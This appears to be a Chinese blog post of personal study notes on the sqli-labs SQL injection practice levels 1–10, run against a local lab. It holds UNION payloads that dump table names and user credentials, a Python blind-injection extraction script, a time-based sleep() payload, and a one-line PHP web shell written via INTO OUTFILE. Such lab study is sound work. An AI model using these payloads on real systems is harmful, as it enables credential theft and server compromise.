个人学习-SQL 记录_0x757365722829-优快云博客

本文链接：https://blog.youkuaiyun.com/qq_38063791/article/details/83824991

这篇博客记录了作者个人在学习SQL过程中的重要知识点，涵盖了从基础到进阶的内容，包括数据查询、表操作等核心概念。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1-5

'''
进数据库之前还会解码,SQL 语法中的语句 不会, str需要hex。 
python的hex：先ascii 转换 再 hex

第一关
CONCAT_WS(sep,s1,s2...,sn)将s1,s2...,sn连接成字符串，并用sep字符间隔
concat_ws(@@version,database(),user())
获取所有数据库名
select 1,2,(select group_concat(schema_name) from information_schema.schemata)#


得到 基本信息
union select 1,concat_ws(0x7C,@@version,database(),0x757365722829),3  #
数据库 hex
0x736563757269747927.
得表名
%27%20union%20select%201,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20%20%20%23
得字段名
id=-1%27%20union%20select%201,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_name=0x7573657273%20and%20table_schema=0x7365637572697479),3%20%20%20%23

得数据:
’ union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)%23




第三关
id=-1')order by 3 %23
爆字段
id=-1%27)union%20select%201,2,3%20%23


基本信息:
id=-1%27)union%20select%201,(select%20concat_ws(database(),@@version,user())),3%20%23

得表名
-1%27)union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20%23

得字段名:

id=-1%27)union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273%20and%20table_schema=0x7365637572697479),3


第四关:
爆出字段
http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,2,3 #

然后
(select group_concat(table_name) from information_schema.tables where table_schema=(select database()))

最后 得数据
select group_concat() from

6-9

import requests



'''
第6关
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and 0 or (length(database())=8) #
'''



'''
第7关

http://127.0.0.1/sqli-labs-master/Less-7/?id=2%27))%20and%200%20or%20(length(database())=8)%23

'''

'''
第8关 完整
'''
import requests
from multiprocessing.dummy import Pool
messagr=[]
#数据库
#poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or "+'(ascii(substr((select database()),%d,1))=%d)'

#表名 29
# 29 个http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=29)#
poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or "+'(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))=%d)'

#列名  20
#http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()))=122) #
poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or "+'(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()),%d,1))=%d)'

#得数据218个字段
#http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(id,0x7c,username,0x7c,password) from security.users))=218) #
poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or"+' (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users),%d,1))=%d)'

def expoit(start,num,poc):
    poc=poc.replace('%20',' ')
    poc=poc%(start,num)+'%20%23'
    # print(poc)
    response=requests.get(poc)
    if 'You are in' in response.text:
        messagr.append(chr(num))
        print('数据库:',''.join(messagr))

def main(starts):
    pool=Pool()
    for start in range(1,starts+1):
        for num in range(31,128):
            pool.apply_async(expoit,args=(start,num,poc))
    pool.close()
    pool.join()

if __name__ == '__main__':
    main(218)

'''
 select "<?php @eval($_POST['giantbranch']);?>" into outfile "XXX\test.php" 
'''



'''
9 10

无回显，只能sleep()来测试
http://localhost/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23 

'''